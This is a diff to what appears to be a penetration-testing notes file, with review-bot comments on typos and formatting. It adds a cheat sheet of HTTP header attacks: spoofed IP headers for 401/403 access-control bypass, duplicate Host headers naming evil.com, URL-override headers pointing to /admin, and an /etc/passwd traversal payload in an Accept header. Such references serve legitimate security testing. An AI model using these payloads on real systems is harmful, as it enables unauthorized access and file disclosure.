@@ -210,11 +210,7 @@ finger batman@$ip
nikto -useproxy http://$ip:3128 -h $ip
```
- ### Cookies
-
- * [ https://cookiepedia.co.uk/ ] ( https://cookiepedia.co.uk/ )
- * "Largest Database of Pre-Categorized Cookies"
- * Scans a website for cookie usage
+ ## Headers
### HTTP Authorization headers
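Review bot: this hunk deletes the `### Cookies` subsection while the next hunk re-adds the same three bullets as `## Cookies`, so the change is a relocation plus a promotion to a level-2 heading rather than a removal; that is worth stating in the commit description so a reader of the history does not think the cookies material was dropped. The new `## Headers` heading is placed directly above `### HTTP Authorization headers`; check it against the file's other level-2 headings (e.g. `## OpenVAS Vulnerability Scanner` in the next hunk) so the hierarchy stays consistent, and confirm the blank line between `## Headers` and the subsection survives.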
@@ -257,6 +253,110 @@ Authorization: AWS4-HMAC-SHA256 Credential=abc/20200618/us-east-1/execute-api/aw
* [ https://www.netsparker.com/whitepaper-http-security-headers/ ] ( https://www.netsparker.com/whitepaper-http-security-headers/ )
* [ https://owasp.org/www-project-secure-headers/ ] ( https://owasp.org/www-project-secure-headers/ )
+ ### Header Bypass Methods
+
+ ``` bash
+ # Add something like 127.0.0.1, localhost, 192.168.1.2, target.com or /admin, /console
+ Client-IP:
+ Connection:
+ Contact:
+ Forwarded:
+ From:
+ Host:
+ Origin:
+ Referer:
+ True-Client-IP:
+ X-Client-IP:
+ X-Custom-IP-Authorization:
+ X-Forward-For:
+ X-Forwarded-For:
+ X-Forwarded-Host:
+ X-Forwarded-Server:
+ X-Host:
+ X-Original-URL:
+ X-Originating-IP:
+ X-Real-IP:
+ X-Remote-Addr:
+ X-Remote-IP:
+ X-Rewrite-URL:
+ X-Wap-Profile:
+
+ # Try to repeat same Host header 2 times
+ Host: legit.com
+ Stuff: stuff
+ Host: evil.com
+
+ # Bypass type limit
+ Accept: application/json, text/javascript, * /* ; q=0.01
+ Accept: ../../../../../../../../../etc/passwd{{'
+
+ # Try to change the HTTP version from 1.1 to HTTP/0.9 and remove the host header
+
+ # 401/403 bypasses
+ # Whitelisted IP 127.0.0.1 or localhost
+ Client-IP: 127.0.0.1
+ Forwarded-For-Ip: 127.0.0.1
+ Forwarded-For: 127.0.0.1
+ Forwarded-For: localhost
+ Forwarded: 127.0.0.1
+ Forwarded: localhost
+ True-Client-IP: 127.0.0.1
+ X-Client-IP: 127.0.0.1
+ X-Custom-IP-Authorization: 127.0.0.1
+ X-Forward-For: 127.0.0.1
+ X-Forward: 127.0.0.1
+ X-Forward: localhost
+ X-Forwarded-By: 127.0.0.1
+ X-Forwarded-By: localhost
+ X-Forwarded-For-Original: 127.0.0.1
+ X-Forwarded-For-Original: localhost
+ X-Forwarded-For: 127.0.0.1
+ X-Forwarded-For: localhost
+ X-Forwarded-Server: 127.0.0.1
+ X-Forwarded-Server: localhost
+ X-Forwarded: 127.0.0.1
+ X-Forwarded: localhost
+ X-Forwared-Host: 127.0.0.1
+ X-Forwared-Host: localhost
+ X-Host: 127.0.0.1
+ X-Host: localhost
+ X-HTTP-Host-Override: 127.0.0.1
+ X-Originating-IP: 127.0.0.1
+ X-Real-IP: 127.0.0.1
+ X-Remote-Addr: 127.0.0.1
+ X-Remote-Addr: localhost
+ X-Remote-IP: 127.0.0.1
+
+ # Fake Origin - make GET request to accesible endpoint with:
+ X-Original-URL: /admin
+ X-Override-URL: /admin
+ X-Rewrite-URL: /admin
+ Referer: /admin
+ # Also try with absolute url https:/domain.com/admin
+
+ # Method Override
+ X-HTTP-Method-Override: PUT
+
+ # Provide full path GET
+ GET https://vulnerable-website.com/ HTTP/1.1
+ Host: evil-website.com
+
+ # Add line wrapping
+ GET /index.php HTTP/1.1
+ Host: vulnerable-website.com
+ Host: evil-website.com
+
+ # Wordlists
+ https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/BurpSuite-ParamMiner/lowercase-headers
+ https://github.com/danielmiessler/SecLists/tree/bbb4d86ec1e234b5d3cfa0a4ab3e20c9d5006405/Miscellaneous/web/http-request-headers
+ ```
+
+ ## Cookies
+
+ * [https://cookiepedia.co.uk/](https://cookiepedia.co.uk/)
+ * "Largest Database of Pre-Categorized Cookies"
+ * Scans a website for cookie usage
+
## OpenVAS Vulnerability Scanner
```bash
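Review bot: the added `### Header Bypass Methods` block carries several typos that will bite anyone copying from it: `X-Forwared-Host` appears twice where the list above it spells the header `X-Forwarded-Host`, the `# Fake Origin` comment has `accesible` for `accessible`, and the absolute-URL example `https:/domain.com/admin` is missing the second slash after `https:`. The `Accept: application/json, text/javascript, * /* ; q=0.01` line also appears to carry a stray space inside `* /*`, which turns the `*/*` wildcard into an invalid media range. The `# Add line wrapping` example (two `Host` headers in one request) repeats the earlier `# Try to repeat same Host header 2 times` example and the two could be merged. The fence is opened as `` ``` bash `` although the body is raw HTTP header lines rather than shell, so `http` would be the more accurate info string. Finally, the two wordlist links are pinned inconsistently, one to `master` and one to commit `bbb4d86ec1e234b5d3cfa0a4ab3e20c9d5006405`; pinning both the same way avoids one of them rotting.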